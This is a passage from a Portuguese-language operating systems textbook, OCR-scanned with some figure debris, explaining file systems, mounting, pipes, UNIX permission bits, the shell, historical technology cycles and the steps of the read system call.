operacional mantém parte do espaço de endereçamento 
na memória principal e parte no disco, enviando trechos 
entre eles para lá e para cá conforme a necessidade. Na 
essência, o sistema operacional cria a abstração de um 
espaço de endereçamento como o conjunto de endere- 
ços ao qual um processo pode se referir. O espaço de 
endereçamento é desacoplado da memória física da má- 
quina e pode ser maior ou menor do que a memória fisi- 
ca. O gerenciamento de espaços de endereçamento e da 
memória física forma uma parte importante do que faz 
um sistema operacional, de maneira que todo o Capítulo 
3 é devotado a esse tópico. 


1.5.3 Arquivos 


Outro conceito fundamental que conta com o su- 
porte de virtualmente todos os sistemas operacionais 
é o sistema de arquivos. Como já foi observado, uma 
função importante do sistema operacional é esconder as 
peculiaridades dos discos e outros dispositivos de E/S 
e apresentar ao programador um modelo agradável e 
claro de arquivos que sejam independentes dos disposi- 
tivos. Chamadas de sistema são obviamente necessárias 
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para criar, remover, ler e escrever arquivos. Antes que 
um arquivo possa ser lido, ele deve ser localizado no 
disco e aberto, e após ter sido lido, deve ser fechado, 
assim as chamadas de sistema são fornecidas para fazer 
essas coisas. 

Para fornecer um lugar para manter os arquivos, a 
maioria dos sistemas operacionais de PCs tem o con- 
ceito de um diretório como uma maneira de agrupar 
os arquivos. Um estudante, por exemplo, pode ter um 
diretório para cada curso que ele estiver seguindo (para 
os programas necessários para aquele curso), outro para 
o correio eletrônico e ainda um para sua página na web. 
Chamadas de sistema são então necessárias para criar e 
remover diretórios. Chamadas também são fornecidas 
para colocar um arquivo existente em um diretório e 
para remover um arquivo de um diretório. Entradas de 
diretório podem ser de arquivos ou de outros diretórios. 
Esse modelo também dá origem a uma hierarquia — o 
sistema de arquivos — como mostrado na Figura 1.14. 

Ambas as hierarquias de processos e arquivos são 
organizadas como árvores, mas a similaridade para aí. 
Hierarquias de processos em geral não são muito pro- 
fundas (mais do que três níveis é incomum), enquan- 
to hierarquias de arquivos costumam ter quatro, cinco, 
ou mesmo mais níveis de profundidade. Hierarquias de 
processos tipicamente têm vida curta, em geral minutos 
no máximo, enquanto hierarquias de diretórios podem 
existir por anos. Propriedade e proteção também dife- 
rem para processos e arquivos. Normalmente, apenas 
um processo pai pode controlar ou mesmo acessar um 
processo filho, mas quase sempre existem mecanismos 
para permitir que arquivos e diretórios sejam lidos por 
um grupo mais amplo do que apenas o proprietário. 

Todo arquivo dentro de uma hierarquia de diretório 
pode ser especificado fornecendo o seu nome de ca- 
minho a partir do topo da hierarquia do diretório, o 
diretório-raiz. Esses nomes de caminho absolutos con- 
sistem na lista de diretórios que precisam ser percorri- 
dos a partir do diretório-raiz para se chegar ao arquivo, 
com barras separando os componentes. Na Figura 1.14, 
o caminho para o arquivo CS101 é /Professores/Prof. 
Brown/Cursos/CS101. A primeira barra indica que o ca- 
minho é absoluto, isto é, começando no diretório-raiz. 
Como nota, no Windows, o caractere barra invertida (\) 
é usado como o separador em vez do caractere da barra 
(/) por razões históricas, então o caminho do arquivo 
acima seria escrito como \Professores\Prof:Brown\Cur- 
sos\CS101. Ao longo deste livro geralmente usaremos a 
convenção UNIX para os caminhos. 

A todo instante, cada processo tem um diretório 
de trabalho atual, no qual são procurados nomes 
de caminhos que não começam com uma barra. Por 
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[FIGURA 1.14] Um sistema de arquivos para um departamento universitário. 


Diretório-raiz 


Estudantes 


Robbert Matty Leo 














Prof.Brown 


Professores 





Prof.White 























exemplo, na Figura 1.14, se /Professores/Prof.Brown 
fosse o diretório de trabalho, o uso do caminho Cur- 
sos/CS101 resultaria no mesmo arquivo que o nome de 
caminho absoluto dado anteriormente. Os processos 
podem mudar seu diretório de trabalho emitindo uma 
chamada de sistema especificando o novo diretório de 
trabalho. 

Antes que um arquivo possa ser lido ou escrito, ele 
precisa ser aberto, momento em que as permissões são 
conferidas. Se o acesso for permitido, o sistema retorna 
um pequeno valor inteiro, chamado descritor de arqui- 
vo, para usá-lo em operações subsequentes. Se o acesso 
for proibido, um código de erro é retornado. 

Outro conceito importante em UNIX é o de monta- 
gem do sistema de arquivos. A maioria dos computado- 
res de mesa tem uma ou mais unidades de discos óticos 
nas quais CD-ROMs, DVDs e discos de Blu-ray podem 
ser inseridos. Eles quase sempre tém portas USB, nas 
quais dispositivos de memoria USB (na realidade, uni- 
dades de disco em estado sólido) podem ser conectados, 
e alguns computadores têm discos flexíveis ou discos 
rígidos externos. Para fornecer uma maneira elegante 
de lidar com essa mídia removível, a UNIX permite que 
o sistema de arquivos no disco ótico seja agregado à ar- 
vore principal. Considere a situação da Figura 1.15(a). 
Antes da chamada mount, o sistema de arquivos-raiz 
no disco rígido e um segundo sistema de arquivos, em 
um CD-ROM, estão separados e desconexos. 


Arquivos 






No entanto, o sistema de arquivos no CD-ROM não 
pode ser usado, pois não há como especificar nomes 
de caminhos nele. O UNIX não permite que nomes de 
caminhos sejam prefixados por um nome ou número 
de um dispositivo acionador; esse seria precisamen- 
te o tipo de dependência de dispositivos que os siste- 
mas operacionais deveriam eliminar. Em vez disso, a 
chamada de sistema mount permite que o sistema de 
arquivos no CD-ROM seja agregado ao sistema de ar- 
quivos-raiz sempre que seja pedido pelo programa. Na 
Figura 1.15(b) o sistema de arquivos no CD-ROM foi 
montado no diretório b, permitindo assim acesso aos ar- 
quivos /b/x e /b/y. Se o diretório b contivesse quaisquer 
arquivos, eles não seriam acessíveis enquanto o CD- 
-ROM estivesse montado, tendo em vista que /b se refe- 
riria ao diretório-raiz do CD-ROM. (A impossibilidade 
de acessar esses arquivos não é tão sério quanto possa 
parecer em um primeiro momento: sistemas de arquivos 
são quase sempre montados em diretórios vazios). Se 
um sistema contém múltiplos discos rígidos, todos eles 
podem ser montados em uma única árvore também. 

Outro conceito importante em UNIX é o arquivo 
especial. Arquivos especiais permitem que dispositivos 
de E/S se pareçam com arquivos. Dessa maneira, eles 
podem ser lidos e escritos com as mesmas chamadas 
de sistema que são usadas para ler e escrever arquivos. 
Existem dois tipos especiais: arquivos especiais de 
bloco e arquivos especiais de caracteres. Arquivos 
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JETER (a) Antes da montagem, os arquivos no CD-ROM não estão acessíveis. (b) Depois da montagem, eles fazem parte da 


hierarquia de arquivos. 


Raiz CD-ROM 


(a) 


especiais de bloco são usados para modelar dispositi- 
vos que consistem em uma coleção de blocos aleatoria- 
mente endereçáveis, como discos. Ao abrir um arquivo 
especial de bloco e ler, digamos, bloco 4, um programa 
pode acessar diretamente o quarto bloco no dispositivo, 
sem levar em consideração a estrutura do sistema de ar- 
quivo contido nele. De modo similar, arquivos especiais 
de caracteres são usados para modelar impressoras, mo- 
dems e outros dispositivos que aceitam ou enviam um 
fluxo de caracteres. Por convenção, os arquivos espe- 
ciais são mantidos no diretório /dev. Por exemplo, /dev/ 
lp pode ser a impressora — que um dia já foi chamada 
de impressora de linha (line printer). 

O último aspecto que discutiremos nesta visão geral 
relaciona-se tanto com os processos quanto com os ar- 
quivos: os pipes. Um pipe é uma espécie de pseudoar- 
quivo que pode ser usado para conectar dois processos, 
como mostrado na Figura 1.16. Se os processos 4 e B 
querem conversar usando um pipe, eles têm de confi- 
gurá-lo antes. Quando o processo 4 quer enviar dados 
para o processo B, ele escreve no pipe como se ele fosse 
um arquivo de saída. Na realidade, a implementação de 
um pipe lembra muito a de um arquivo. O processo B 
pode ler os dados a partir do pipe como se ele fosse um 
arquivo de entrada. Desse modo, a comunicação entre 
os processos em UNIX se parece muito com a leitura 
e escrita de arquivos comuns. É ainda mais forte, pois 
a única maneira pela qual um processo pode descobrir 
se o arquivo de saída em que ele está escrevendo não 
é realmente um arquivo, mas um pipe, é fazendo uma 
chamada de sistema especial. Sistemas de arquivos são 
muito importantes. Teremos muito para falar a respeito 
deles no Capítulo 4 e também nos capítulos 10 e 11. 


eit: TEA Dois processos conectados por um pipe. 


Processo Processo 


E) 





(b) 


1.5.4 Entrada/Saída 


Todos os computadores têm dispositivos físicos para 
obter entradas e produzir saídas. Afinal, para que servi- 
ria um computador se os usuários não pudessem dizer 
a ele o que fazer e não pudessem receber os resultados 
após ele ter feito o trabalho pedido? Existem muitos ti- 
pos de dispositivos de entrada e de saída, incluindo te- 
clados, monitores, impressoras e assim por diante. Cabe 
ao sistema operacional gerencia-los. 

Em consequência, todo sistema operacional tem um 
subsistema de E/S para gerenciar os dispositivos de E/S. 
Alguns softwares de E/S são independentes do dispo- 
sitivo, isto é, aplicam-se igualmente bem a muitos ou 
a todos dispositivos de E/S. Outras partes dele, como 
drivers de dispositivo, são específicos a dispositivos de 
E/S particulares. No Capítulo 5 examinaremos o soft- 
ware de E/S. 


1.5.5 Proteção 


Computadores contêm grandes quantidades de infor- 
mações que os usuários muitas vezes querem proteger e 
manter confidenciais. Essas informações podem incluir 
e-mails, planos de negócios, declarações fiscais e muito 
mais. Cabe ao sistema operacional gerenciar a seguran- 
ça do sistema de maneira que os arquivos, por exemplo, 
sejam acessíveis somente por usuários autorizados. 

Como um exemplo simples, apenas para termos uma 
ideia de como a segurança pode funcionar, considere o 
UNIX. Arquivos em UNIX são protegidos designando- 
-se a cada arquivo um código de proteção binário de 9 
bits. O código de proteção consiste de três campos de 3 
bits, um para o proprietário, um para os outros membros 
do grupo do proprietário (usuários são divididos em 
grupos pelo administrador do sistema) e um para todos 
os demais usuários. Cada campo tem um bit de permis- 
são de leitura, um bit de permissão de escrita e um bit 
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de permissão de execução. Esses 3 bits são conhecidos 
como os bits rwx. Por exemplo, o código de proteção 
rwxr-x--x significa que o proprietário pode ler (read), 
escrever (write), ou executar (execute) o arquivo, que 
outros membros do grupo podem ler ou executar (mas 
não escrever) o arquivo e que todos os demais podem 
executar (mas não ler ou escrever) o arquivo. Para um 
diretório, x indica permissão de busca. Um traço signifi- 
ca que a permissão correspondente está ausente. 

Além da proteção ao arquivo, há muitas outras ques- 
tões de segurança. Proteger o sistema de intrusos inde- 
sejados, humanos ou não (por exemplo, vírus) é uma 
delas. Examinaremos várias questões de segurança no 
Capítulo 9. 


1.5.6 O interpretador de comandos (shell) 


O sistema operacional é o código que executa as cha- 
madas de sistema. Editores, compiladores, montadores, 
ligadores (linkers), programas utilitários e interpretado- 
res de comandos definitivamente não fazem parte do sis- 
tema operacional, mesmo que sejam importantes e úteis. 
Correndo o risco de confundir as coisas de certa maneira, 
nesta seção examinaremos brevemente o interpretador 
de comandos UNIX, o shell. Embora não faça parte do 
sistema operacional, ele faz um uso intensivo de muitos 
aspectos do sistema operacional e serve assim como um 
bom exemplo de como as chamadas de sistema são usa- 
das. Ele também é a principal interface entre um usuário 
sentado no seu terminal e o sistema operacional, a não 
ser que o usuário esteja usando uma interface de usuário 
gráfica. Muitos shells existem, incluindo, sh, csh, ksh e 
bash. Todos eles dão suporte à funcionalidade descrita a 
seguir, derivada do shell (sh) original. 

Quando qualquer usuário se conecta, um shell é 
iniciado. O shell tem o terminal como entrada-padrão 
e saída-padrão. Ele inicia emitindo um caractere de 
prompt, um caractere como o cifrão do dólar, que diz 
ao usuário que o shell está esperando para aceitar um 
comando. Se o usuário agora digitar 


date 


por exemplo, o shell cria um processo filho e executa o 
programa date como um filho. Enquanto o processo fi- 
lho estiver em execução, o shell espera que ele termine. 
Quando o filho termina, o shell emite o sinal de prompt 
de novo e tenta ler a próxima linha de entrada. 

O usuário pode especificar que a saída-padrão seja 
redirecionada para um arquivo, por exemplo, 


date >file 


De modo similar, a entrada-padrão pode ser redire- 
cionada, como em 


sort <file1 >file2 


que invoca o programa sort com a entrada vindo de file1 
e a saída enviada para file2. 

A saída de um programa pode ser usada como entra- 
da por outro programa conectando-os por meio de um 
pipe. Assim, 


cat file1 file2 file3 | sort >/dev/lp 


invoca o programa cat para concatenar três arquivos e 
enviar a saída para que o sort organize todas as linhas 
em ordem alfabética. A saída de sort é redirecionada 
para o arquivo /dev/Ip, tipicamente a impressora. 

Se um usuário coloca um & após um comando, o 
shell não espera que ele termine. Em vez disso, ele dá 
um prompt imediatamente. Em consequência, 


cat file1 file2 file3 | sort >/dev/lp & 


inicia o sort como uma tarefa de segundo plano, permi- 
tindo que o usuário continue trabalhando normalmente 
enquanto o ordenamento prossegue. O shell tem uma sé- 
rie de outros aspectos interessantes, mas que não temos 
espaço para discuti-los aqui. A maioria dos livros em 
UNIX discute o shell mais detalhadamente (por exem- 
plo, KERNIGHAN e PIKE, 1984; QUIGLEY, 2004; 
ROBBINS, 2005). 

A maioria dos computadores pessoais usa hoje uma 
interface gráfica GUI. Na realidade, a GUI é apenas um 
programa sendo executado em cima do sistema opera- 
cional, como um shell. Nos sistemas Linux, esse fato é 
óbvio, pois o usuário tem uma escolha de (pelo menos) 
duas GUIs: Gnome e KDE ou nenhuma (usando uma 
janela de terminal no X11). No Windows, também é 
possível substituir a área de trabalho com interface GUI 
padrão (Windows Explorer) por um programa diferente 
alterando alguns programas no registro, embora poucas 
pessoas o façam. 


1.5.7 A ontogenia recapitula a filogenia 


Após o livro de Charles Darwin 4 origem das espé- 
cies ter sido publicado, o zoólogo alemão Ernst Haeckel 
declarou que “a ontogenia recapitula a filogenia”. Com 
isso ele queria dizer que o desenvolvimento de um em- 
brião (ontogenia) repete (isto é, recapitula) a evolução 
da espécie (filogenia). Em outras palavras, após a fer- 
tilização, um ovo humano passa pelos estágios de ser 
um peixe, um porco e assim por diante, antes de trans- 
formar-se em um bebê humano. Biólogos modernos 


consideram isso uma simplificação grosseira, mas ainda 
há alguma verdade nela. 

Algo vagamente análogo aconteceu na indústria 
de computadores. Cada nova espécie (computador de 
grande porte, minicomputador, computador pessoal, 
portátil, embarcado, cartões inteligentes etc.) parece 
passar pelo mesmo desenvolvimento que seus anteces- 
sores, tanto em hardware quanto em software. Muitas 
vezes esquecemos que grande parte do que acontece 
no negócio dos computadores e em um monte de ou- 
tros campos é impelido pela tecnologia. A razão por 
que os romanos antigos não tinham carros não era por 
eles gostarem tanto de caminhar. É porque não sabiam 
como construir carros. Computadores pessoais existem 
não porque milhões de pessoas têm um desejo contido 
de centenas de anos de ter um computador, mas por- 
que agora é possível fabricá-los barato. Muitas vezes 
esquecemos o quanto a tecnologia afeta nossa visão 
dos sistemas e vale a pena refletir sobre isso de vez 
em quando. 

Em particular, acontece com frequência de uma mu- 
dança na tecnologia tornar uma ideia obsoleta e ela ra- 
pidamente desaparece. No entanto, outra mudança na 
tecnologia poderia revivê-la. Isso é especialmente ver- 
dadeiro quando a mudança tem a ver com o desempenho 
relativo de diferentes partes do sistema. Por exemplo, 
quando as CPUs se tornaram muito mais rápidas do que 
as memórias, caches se tornaram importantes para ace- 
lerar a memória “lenta”. Se a nova tecnologia de memó- 
ria algum dia tornar as memórias muito mais rápidas do 
que as CPUs, as caches desaparecerão. E se uma nova 
tecnologia de CPU torná-las mais rápidas do que as me- 
mórias novamente, as caches reaparecerão. Na biologia, 
a extinção é para sempre, mas, na ciência de computa- 
dores, às vezes ela é apenas por alguns anos. 

Como uma consequência dessa impermanência, exa- 
minaremos de tempos em tempos neste livro conceitos 
“obsoletos”, isto é, ideias que não são as melhores para 
a tecnologia atual. No entanto, mudanças na tecnologia 
podem trazer de volta alguns dos chamados “conceitos 
obsoletos”. Por essa razão, é importante compreender 
por que um conceito é obsoleto e quais mudanças no 
ambiente podem trazê-lo de volta. 

Para esclarecer esse ponto, vamos considerar um 
exemplo simples. Os primeiros computadores tinham 
conjuntos de instruções implementados no hardware. 
As instruções eram executadas diretamente pelo hard- 
ware e não podiam ser mudadas. Então veio a mi- 
croprogramação (introduzida pela primeira vez em 
grande escala com o IBM 360), no qual um interpreta- 
dor subjacente executava as “instruções do hardware” 
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no software. A execução implementada no hardware 
tornou-se obsoleta. Ela não era suficientemente flexi- 
vel. Então os computadores RISC foram inventados, 
e a microprogramação (isto é, execução interpretada) 
tornou-se obsoleta porque a execução direta era mais 
rápida. Agora estamos vendo o ressurgimento da inter- 
pretação na forma de applets Java, que são enviados 
pela internet e interpretados na chegada. A velocidade 
de execução nem sempre é crucial, pois os atrasos de 
rede são tão grandes que eles tendem a predominar. 
Desse modo, o pêndulo já oscilou vários ciclos entre a 
execução direta e a interpretação e pode ainda oscilar 
novamente no futuro. 


Memórias grandes 


Vamos examinar agora alguns desenvolvimentos 
históricos em hardware e como eles afetaram o software 
repetidamente. Os primeiros computadores de grande 
porte tinham uma memória limitada. Um IBM 7090 ou 
um 7094 completamente carregados, que eram os me- 
lhores computadores do final de 1959 até 1964, tinha 
apenas um pouco mais de 128 KB de memória. Em sua 
maior parte, eram programados em linguagem de mon- 
tagem e seu sistema operacional era escrito nessa lin- 
guagem para poupar a preciosa memória. 

Com o passar do tempo, compiladores para lingua- 
gens como FORTRAN e COBOL tornaram-se tão bons 
que a linguagem de montagem foi abandonada. Mas 
quando o primeiro minicomputador comercial (o PDP-1) 
foi lançado, ele tinha apenas 4.096 palavras de 18 bits de 
memória, e a linguagem de montagem fez um retorno 
surpreendente. Por fim, os minicomputadores adquiri- 
ram mais memória e as linguagens de alto nível torna- 
ram-se prevalentes neles. 

Quando os microcomputadores tornaram-se um su- 
cesso no início da década de 1980, os primeiros tinham 
memórias de 4 KB e a programação de linguagem de 
montagem foi ressuscitada. Computadores embarcados 
muitas vezes usam os mesmos chips de CPU que os mi- 
crocomputadores (8080s, Z80s e mais tarde 8086s) e 
também inicialmente foram programados em linguagem 
de montagem. Hoje, seus descendentes, os computado- 
res pessoais, têm muita memória e são programados em 
C, C++, Java e outras linguagens de alto nível. Cartões 
inteligentes estão passando por um desenvolvimento 
similar, embora a partir de um determinado tamanho, 
os cartões inteligentes tenham um interpretador Java e 
executem os programas Java de maneira interpretativa, 
em vez de ter o Java compilado para a linguagem de 
máquina do cartão inteligente. 
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Hardware de proteção 


Os primeiros computadores de grande porte, como o 
IBM 7090/7094, não tinham hardware de proteção, de 
maneira que eles executavam apenas um programa de 
cada vez. Um programa defeituoso poderia acabar com 
o sistema operacional e facilmente derrubar a máquina. 
Com a introdução do IBM 360, uma forma primitiva 
de proteção de hardware tornou-se disponível. Essas 
máquinas podiam então armazenar vários programas na 
memória ao mesmo tempo e deixá-los que se alternas- 
sem na execução (multiprogramação). A monoprogra- 
mação tornou-se obsoleta. 

Pelo menos até o primeiro minicomputador aparecer 
— sem hardware de proteção — a multiprogramação 
não era possível. Embora o PDP-1 e o PDP-8 não tives- 
sem hardware de proteção, finalmente o PDP-11 teve, 
e esse aspecto levou à multiprogramação e por fim ao 
UNIX. 

Quando os primeiros microcomputadores foram 
construídos, eles usavam o chip de CPU Intel 8080, que 
não tinha proteção de hardware, então estávamos de 
volta à monoprogramação — um programa na memória 
de cada vez. Foi somente com o chip 80286 da Intel que 
o hardware de proteção foi acrescentado e a multipro- 
gramação tornou-se possível. Até hoje, muitos sistemas 
embarcados não têm hardware de proteção e executam 
apenas um único programa. 

Agora vamos examinar os sistemas operacionais. Os 
primeiros computadores de grande porte inicialmente 
não tinham hardware de proteção e nenhum suporte 
para multiprogramação, então sistemas operacionais 
simples eram executados neles. Esses sistemas lidavam 
com apenas um programa carregado manualmente por 
vez. Mais tarde, eles adquiriram o suporte de hardware 
e sistema operacional para lidar com múltiplos progra- 
mas ao mesmo tempo, e então capacidades de compar- 
tilhamento de tempo completas. 

Quando os minicomputadores apareceram pela pri- 
meira vez, eles também não tinham hardware de pro- 
teção e os programas carregados manualmente eram 
executados um a um, mesmo com a multiprogramação 
já bem estabelecida no mundo dos computadores de 
grande porte. Pouco a pouco, eles adquiriram hardware 
de proteção e a capacidade de executar dois ou mais 
programas ao mesmo tempo. Os primeiros microcom- 
putadores também eram capazes de executar apenas um 
programa de cada vez, porém mais tarde adquiriram a 
capacidade de multiprogramar. Computadores portáteis 
e cartões inteligentes seguiram o mesmo caminho. 

Em todos os casos, o desenvolvimento do software foi 
ditado pela tecnologia. Os primeiros microcomputadores, 


por exemplo, tinham algo como 4 KB de memória e ne- 
nhum hardware de proteção. Linguagens de alto nível e 
a multiprogramação eram simplesmente demais para um 
sistema tão pequeno lidar. À medida que os microcom- 
putadores evoluíram para computadores pessoais mo- 
dernos, eles adquiriam o hardware necessário e então o 
software necessário para lidar com aspectos mais avan- 
cados. É provável que esse desenvolvimento vá continu- 
ar por muitos anos ainda. Outros campos talvez também 
tenham esse ciclo de reencarnação, mas na indústria dos 
computadores ele parece girar mais rápido. 


Discos 


Os primeiros computadores de grande porte eram 
em grande parte baseados em fitas magnéticas. Eles 
liam um programa a partir de uma fita, compilavam-no 
e escreviam os resultados de volta para outra fita. Não 
havia discos e nenhum conceito de um sistema de arqui- 
vos. Isso começou a mudar quando a IBM introduziu o 
primeiro disco rígido — o RAMAC (RAndoM ACcess) 
em 1956. Ele ocupava cerca de 4 m? de espaço e podia 
armazenar 5 milhões de caracteres de 7 bits, o suficiente 
para uma foto digital de resolução média. Mas com uma 
taxa de aluguel anual de US$ 35.000, reunir um número 
suficiente deles para armazenar o equivalente a um rolo 
de filme tornava-se caro rapidamente. Mas por fim os 
preços baixaram e os sistemas de arquivos primitivos 
foram desenvolvidos. 

Representativo desses novos desenvolvimentos foi o 
CDC 6600, introduzido em 1964 e, por anos, de longe 
o computador mais rápido no mundo. Usuários podiam 
criar os chamados “arquivos permanentes” dando a 
eles nomes e esperando que nenhum outro usuário ti- 
vesse decidido que, digamos, “dados” fosse um nome 
adequado para um arquivo. Tratava-se de um diretório 
de um único nível. Por fim, computadores de grande 
porte desenvolveram sistemas de arquivos hierárquicos 
complexos, talvez culminando no sistema de arquivos 
MULTICS. 

Quando os minicomputadores passaram a ser usa- 
dos, eles eventualmente também tinham discos rígidos. 
O disco padrão no PDP-11 quando foi introduzido em 
1970 foi o disco RK05, com uma capacidade de 2,5 MB, 
cerca de metade do IBM RAMAC, mas com apenas em 
torno de 40 cm de diâmetro e 5 cm de altura. Mas ele, 
também, inicialmente tinha um diretório de um único 
nível. Quando os microcomputadores foram lançados, 
o CP/M foi no início o sistema operacional dominante, 
e ele, também, dava suporte a apenas um diretório no 
disco (flexível). 


Memória virtual 


A memória virtual (discutida no Capítulo 3) propor- 
ciona a capacidade de executar programas maiores do 
que a memória física da máquina, rapidamente moven- 
do pedaços entre a memória RAM e o disco. Ela passou 
por um desenvolvimento similar, primeiro aparecendo 
nos computadores de grande porte, então passando para 
os minis e os micros. A memória virtual também per- 
mitiu que um programa se conectasse dinamicamente 
a uma biblioteca no momento da execução em vez de 
fazê-lo na compilação. O MULTICS foi o primeiro sis- 
tema a permitir isso. Por fim, a ideia propagou-se adian- 
te e agora é amplamente usada na maioria dos sistemas 
UNIX e Windows. 

Em todos esses desenvolvimentos, vemos ideias 
inventadas em um contexto e mais tarde jogadas fora 
quando o contexto muda (programação em linguagem 
de montagem, monoprogramação, diretórios em nível 
único etc.) apenas para reaparecer em um contexto di- 
ferente muitas vezes uma década mais tarde. Por essa 
razão, neste livro às vezes veremos ideias e algoritmos 
que talvez pareçam datados nos PCs de gigabytes de 
hoje, mas que podem voltar logo em computadores em- 
barcados e cartões inteligentes. 


1.6 Chamadas de sistema 


Vimos que os sistemas operacionais têm duas fun- 
ções principais: fornecer abstrações para os programas 
de usuários e gerenciar os recursos do computador. Em 
sua maior parte, a interação entre programas de usuá- 
rios e o sistema operacional lida com a primeira; por 
exemplo, criar, escrever, ler e deletar arquivos. A par- 
te de gerenciamento de arquivos é, em grande medida, 
transparente para os usuários e feita automaticamente. 
Desse modo, a interface entre os programas de usuários 
e o sistema operacional diz respeito fundamentalmen- 
te a abstrações. Para compreender de verdade o que os 
sistemas operacionais fazem, temos de examinar essa 
interface de perto. As chamadas de sistema disponíveis 
na interface variam de um sistema para outro (embora 
os conceitos subjacentes tendam a ser similares). 

Somos então forçados a fazer uma escolha entre (1) 
generalidades vagas (“sistemas operacionais têm cha- 
madas de sistema para ler arquivos”) e (2) algum siste- 
ma específico (“UNIX possui uma chamada de sistema 
read com três parâmetros: um para especificar o arqui- 
vo, um para dizer onde os dados devem ser colocados e 
outro para dizer quantos bytes devem ser lidos”). 
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Escolhemos a segunda abordagem. Ela é mais traba- 
lhosa, mas proporciona um entendimento melhor sobre 
o que os sistemas operacionais realmente fazem. Em- 
bora essa discussão se refira especificamente ao POSIX 
(International Standard 9945-1), em consequência tam- 
bém o UNIX, System V, BSD, Linux, MINIX 3 e assim 
por diante, a maioria dos outros sistemas operacionais 
modernos tem chamadas de sistema que desempenham 
as mesmas funções, mesmo que os detalhes difiram. 
Como os mecanismos reais de emissão de uma chama- 
da de sistema são altamente dependentes da máquina e 
muitas vezes devem ser expressos em código de monta- 
gem, uma biblioteca de rotinas é fornecida para tornar 
possível fazer chamadas de sistema de programas C e 
muitas vezes de outras linguagens também. 

Convém ter o seguinte em mente. Qualquer compu- 
tador de uma única CPU pode executar apenas uma ins- 
trução de cada vez. Se um processo estiver executando 
um programa de usuário em modo de usuário e precisa 
de um serviço de sistema, como ler dados de um ar- 
quivo, ele tem de executar uma instrução de armadilha 
(trap) para transferir o controle para o sistema operacio- 
nal. O sistema operacional verifica os parâmetros e des- 
cobre o que o processo que está chamando quer. Então 
ele executa a chamada de sistema e retorna o controle 
para a instrução seguinte à chamada de sistema. De cer- 
ta maneira, fazer uma chamada de sistema é como fazer 
um tipo especial de chamada de rotina, apenas que as 
chamadas de sistema entram no núcleo e as chamadas 
de rotina, não. 

Para esclarecer o mecanismo de chamada de sistema, 
vamos fazer uma análise rápida da chamada de sistema 
read. Como mencionado anteriormente, ela tem três pa- 
râmetros: o primeiro especificando o arquivo, o segun- 
do é um ponteiro para o buffer e o terceiro dá o número 
de bytes a ser lido. Como quase todas as chamadas de 
sistema, ele é invocado de programas C chamando uma 
rotina de biblioteca com o mesmo nome que a chama- 
da de sistema: read. Uma chamada de um programa C 
pode parecer desta forma: 


contador = read(fd, buffer, nbytes) 


A chamada de sistema (e a rotina de biblioteca) re- 
tornam o número de bytes realmente lidos em contador. 
Esse valor é normalmente o mesmo que nbytes, mas 
pode ser menor, se, por exemplo, o caractere fim-de- 
-arquivo for encontrado durante a leitura. 

Se a chamada de sistema não puder ser realizada por 
causa de um parâmetro inválido ou de um erro de dis- 
co, o contador passa a valer —1, e o número de erro é 
colocado em uma variável global, errno. Os programas 
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devem sempre conferir os resultados de uma chamada 
de sistema para ver se um erro ocorreu. 

Chamadas de sistema são realizadas em uma série 
de passos. Para deixar o conceito mais claro, vamos 
examinar a chamada read discutida anteriormente. Em 
preparação para chamar a rotina de biblioteca read, que 
na realidade é quem faz a chamada de sistema read, o 
programa de chamada primeiro empilha os parâmetros, 
como mostrado nos passos 1 a 3 na Figura 1.17. 

Os compiladores C e C++ empilham os parâmetros 
em ordem inversa por razões históricas (a ideia é fazer 
o primeiro parâmetro de printf, a cadeia de caracteres 
do formato, aparecer no topo da pilha). O primeiro e 
o terceiro parâmetros são chamados por valor, mas o 
segundo parâmetro é passado por referência, signifi- 
cando que o endereço do buffer (indicado por &) é 
passado, não seu conteúdo. Então vem a chamada real 
para a rotina de biblioteca (passo 4). Essa instrução é 
a chamada normal de rotina usada para chamar todas 
as rotinas. 

A rotina de biblioteca, possivelmente escrita em lin- 
guagem de montagem, tipicamente coloca o número da 
chamada de sistema em um lugar onde o sistema opera- 
cional a espera, como um registro (passo 5). Então ela 
executa uma instrução TRAP para passar do modo usu- 
ário para o modo núcleo e começar a execução em um 
endereço fixo dentro do núcleo (passo 6). A instrução 
TRAP é na realidade relativamente similar à instrução 


de chamada de rotina no sentido de que a instrução que 
a segue é tirada de um local distante e o endereço de 
retorno é salvo na pilha para ser usado depois. 

Entretanto, a instrução TRAP também difere da ins- 
trução de chamada de rotina de duas maneiras funda- 
mentais. Primeiro, como efeito colateral, ela troca para 
o modo núcleo. A instrução de chamada de rotina não 
muda o modo. Segundo, em vez de dar um endereço 
relativo ou absoluto onde a rotina está localizada, a ins- 
trução TRAP não pode saltar para um endereço arbitrá- 
rio. Dependendo da arquitetura, ela salta para um único 
local fixo, ou há um campo de 8 bits na instrução for- 
necendo o índice para uma tabela na memória contendo 
endereços para saltar, ou algo equivalente. 

O código de núcleo que se inicia seguindo a instru- 
ção TRAP examina o número da chamada de sistema 
e então o despacha para o tratador correto da chama- 
da de sistema, normalmente através de uma tabela 
de ponteiros que designam as rotinas de tratamento 
de chamadas de sistema indexadas pelo número da 
chamada (passo 7). Nesse ponto, é executado o trata- 
mento de chamada de sistema (passo 8). Uma vez que 
ele tenha completado o seu trabalho, o controle pode 
ser retornado para a rotina de biblioteca no espaço 
do usuário na instrução após a instrução TRAP (pas- 
so 9). Essa rotina retorna para o programa do usuário 
da maneira usual que as chamadas de rotina retornam 
(passo 10). 


le] WBRA Os 11 passos na realização da chamada de sistema read (fd, buffer, nbytes). 


Endereço 
OxFFFFFFFF _ 


Espaço do usuário < 


Espaço do núcleo < 
(Sistema operacional) 








Retorno a quem chamou 
Armadilha para o núcleo 


Coloca código para read no 
registrador 


Rotina read 
da biblioteca 


Incrementa SP. 11 
Chamada read 
Empilha fd 

Empilha &buffer read 
Empilha nbytes 


Programa 
do usuário 
chamando 


7 8 Tratador de 
=. chamada de sistema 


Para terminar a tarefa, o programa do usuário tem de 
limpar a pilha, como ele faz após qualquer chamada de 
rotina (passo 11). Presumindo que a pilha cresce para 
baixo, como muitas vezes é o caso, o código compilado 
incrementa o ponteiro da pilha exatamente o suficiente 
para remover os parâmetros empilhados antes da cha- 
mada read. O programa está livre agora para fazer o que 
quiser em seguida. 

No passo 9, dissemos “pode ser retornado para a ro- 
tina de biblioteca no espaço do usuário” por uma boa 
razão. A chamada de sistema pode bloquear quem a 
chamou, impedindo-o de seguir. Por exemplo, se ele 
está tentando ler do teclado e nada foi digitado ainda, 
ele tem de ser bloqueado. Nesse caso, o sistema opera- 
cional vai procurar à sua volta para ver se algum outro 
processo pode ser executado em seguida. Mais tarde, 
quando a entrada desejada estiver disponível, esse pro- 
cesso receberá a atenção do sistema e executará os pas- 
sos 9-11. 

